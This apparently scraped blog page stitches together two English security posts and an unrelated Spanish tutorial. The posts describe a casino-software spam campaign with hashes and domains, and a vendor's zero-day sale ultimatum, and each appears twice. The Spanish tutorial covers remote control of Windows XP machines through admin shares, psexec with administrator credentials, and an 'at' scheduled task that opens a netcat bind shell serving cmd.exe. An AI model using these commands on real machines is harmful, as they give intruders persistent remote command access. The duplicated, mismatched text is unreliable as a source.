Don’t Play Poker on an Infected Table
The scammy Euro VIP Casino is making another round this afternoon and trying to entice the spammed European users into downloading its software by promising $400 as a welcome bonus. Needless to say you ought to ignore it. Here’s a full list of the typosquatted domains serving the scams.
Detection rate : Result: 11/32 (34.38%)
File size: 461341 bytes
MD5: e68763c16f31de340681b2c7c7eb6b0e
SHA1: 6174960cf5a6c503b97c9160f5e6a5babfef96e9
Online gambling is a buzz Internet activity allowing malicious parties to enjoy the “pull effect” by end users who themselves look for and download such applications. In this spamming campaign, however, we have a combination of a “push” approach, segmentation targeting European users, social engineering in the form of a promotion, and typosquatting. The first campaign (SetupCasino.exe) is currently hosted in China (116.199.136.29) on a host managing a second online gambling scam campaign impersonating Golden Gate Casino (SmartDownload.exe) under the following domains topgamecasino.net; superroyalcasino.com; nlymycasino.cn; lookforcasino.cn
Don’t Play Poker on an Infected Table
The scammy Euro VIP Casino is making another round this afternoon and trying to entice the spammed European users into downloading its software by promising $400 as a welcome bonus. Needless to say you ought to ignore it. Here’s a full list of the typosquatted domains serving the scams.
Detection rate : Result: 11/32 (34.38%)
File size: 461341 bytes
MD5: e68763c16f31de340681b2c7c7eb6b0e
SHA1: 6174960cf5a6c503b97c9160f5e6a5babfef96e9
Online gambling is a buzz Internet activity allowing malicious parties to enjoy the “pull effect” by end users who themselves look for and download such applications. In this spamming campaign, however, we have a combination of a “push” approach, segmentation targeting European users, social engineering in the form of a promotion, and typosquatting. The first campaign (SetupCasino.exe) is currently hosted in China (116.199.136.29) on a host managing a second online gambling scam campaign impersonating Golden Gate Casino (SmartDownload.exe) under the following domains topgamecasino.net; superroyalcasino.com; nlymycasino.cn; lookforcasino.cn
Como administrar remotamente equipos de una red local con windows xp
XP comparte por defecto sus unidades a efectos de administración. Estas unidades estan ocultas a la red al llevar el sufijo $.
Para acceder desde DOS a estos recursos desde otro ordenador de la red se usa el comando Net use. Este comando es un poco remolón y a veces como que se empeña en no dejar conectarnos. La sintaxis completa es:
net use \\ip_remota\ password_pc_remoto/u:ip_remota\administrador_pc_remoto
En este punto tendremos ya mapeada la unidad del pc remoto y podremos trabajar con sus ficheros como si fuese un disco más de nuestro ordenador. Para usar este comando basta con que el pc remoto esté encendido, no hace falta que tenga ninguna sesión iniciada Cuando acabemos nuestra tarea debemos acordarnos de quitar el recurso que acabamos de compartir.
Eso se hace mediante el comando:
Net use /delete Net use * /delete (elimina todas las unidades compartidas)
Con psexec:
psexec \\ip_remota –u -p -s
ej: psexec \\xxx.xxx.xx.xx –u administrador –p miclave –s cmd
Manipular grupos y cuentas de usuarios Usaremos el comando NET para crear y borrar usuarios y asignarlos a los grupos que más nos interesen. Las que más pueden servirnos para nuestros propósitos son:
sc query Muestra información sobre los servicios y su estado en la máuina en la que se ejecuta.
sc config Permite configurar diversas propiedades del servicio (habiltar, deshabilitar, inicio manual o automatico.
Tasklist lista los procesos en ejecución, para entendernos es como si fuese el administrador de tareas en linea de comandos
Taskkill /F /PID permite forzar el cierre de un proceso identificado por su PID.
Ejecutar una tarea programada en remoto
Podemos usar en el pc remoto el comando AT para programarle tareas. Por ejemplo:
at \\ip_remota 12:00A /every:1 “” nc –d –L –p 8080 –e cmd.exe
Zero Day Vulnerabilities Market Model Gone Wrong
It’s one thing to allow legitimate buyers, presumably the affected vendors themselves to bid for a zero day vulnerability discovered within their products in order to provide financial incentive for the researcher that discovered the flaw, another to superficially increase the monetary value of a zero day vulnerability taking advantage of its vendor-added exclusiveness, but entirely another to position responsible disclosure as an exclusive courteousness. Here’s a sample letter informing the company within whose products a vulnerability has been found, and yes, the ultimatum for not releasing it :
“We’ve discovered an attack against the LinkedIn toolbar. If you are interested in the bug, we would like to give first right of refusal to purchase it. We’d also like to perform a more complete security audit of your products. We can help make the LinkedIn products more secure,” DeMott stated in e-mail sent to LinkedIn on July 10, as viewed by CNET News.com. The e-mail continues: “If you wouldn’t like to buy it then we are happy to resell or release as a full disclosure to help prevent security issues arising on end users servers. We strongly believe in keeping users safe. We are unique in that we give vendors a first chance at the bugs we discover rather than selling to a third-party or releasing publicly. Please find the VDA Labs Value add document attached. If you’d like to buy the bug we will provide working attack code, so that you can verify the bug, before you send the check.” VDA set a deadline of July 17 and requested a payment of $5,000.“
I first mentioned the possibility of having a security researcher blackmail an affected party a long time ago, however, I never thought it would be a company with serious knowledge in the field that’s setting ultimatums, doubling the requested amount for the vulnerabilities if the vendor delays the response and threatening to release a PoC in a full disclosure style. Getting paid for getting hacked in reverse order – getting hacked for not paying. However, the ugly reality goes that what’s a zero day for the mainstream media today is last month’s zero day for the underground that’s been improving the chances of success of their targeted attacks against a specific company or an individual. That’s of course in the rare cases when malware authors no longer keep it simple, the stupids.
Here’s another article on this story. Image courtesy of eEye’s Zero Day Tracker.
Zero Day Vulnerabilities Market Model Gone Wrong
It’s one thing to allow legitimate buyers, presumably the affected vendors themselves to bid for a zero day vulnerability discovered within their products in order to provide financial incentive for the researcher that discovered the flaw, another to superficially increase the monetary value of a zero day vulnerability taking advantage of its vendor-added exclusiveness, but entirely another to position responsible disclosure as an exclusive courteousness. Here’s a sample letter informing the company within whose products a vulnerability has been found, and yes, the ultimatum for not releasing it :
“We’ve discovered an attack against the LinkedIn toolbar. If you are interested in the bug, we would like to give first right of refusal to purchase it. We’d also like to perform a more complete security audit of your products. We can help make the LinkedIn products more secure,” DeMott stated in e-mail sent to LinkedIn on July 10, as viewed by CNET News.com. The e-mail continues: “If you wouldn’t like to buy it then we are happy to resell or release as a full disclosure to help prevent security issues arising on end users servers. We strongly believe in keeping users safe. We are unique in that we give vendors a first chance at the bugs we discover rather than selling to a third-party or releasing publicly. Please find the VDA Labs Value add document attached. If you’d like to buy the bug we will provide working attack code, so that you can verify the bug, before you send the check.” VDA set a deadline of July 17 and requested a payment of $5,000.“
I first mentioned the possibility of having a security researcher blackmail an affected party a long time ago, however, I never thought it would be a company with serious knowledge in the field that’s setting ultimatums, doubling the requested amount for the vulnerabilities if the vendor delays the response and threatening to release a PoC in a full disclosure style. Getting paid for getting hacked in reverse order – getting hacked for not paying. However, the ugly reality goes that what’s a zero day for the mainstream media today is last month’s zero day for the underground that’s been improving the chances of success of their targeted attacks against a specific company or an individual. That’s of course in the rare cases when malware authors no longer keep it simple, the stupids.
Here’s another article on this story. Image courtesy of eEye’s Zero Day Tracker.
-
Recent Comments
hoppiemochie on vBulletin v3.6.8 PREMODED with… pedro on Flashden Two Level Accordian M… Radeheatahemy on vBulletin v3.6.8 PREMODED with…
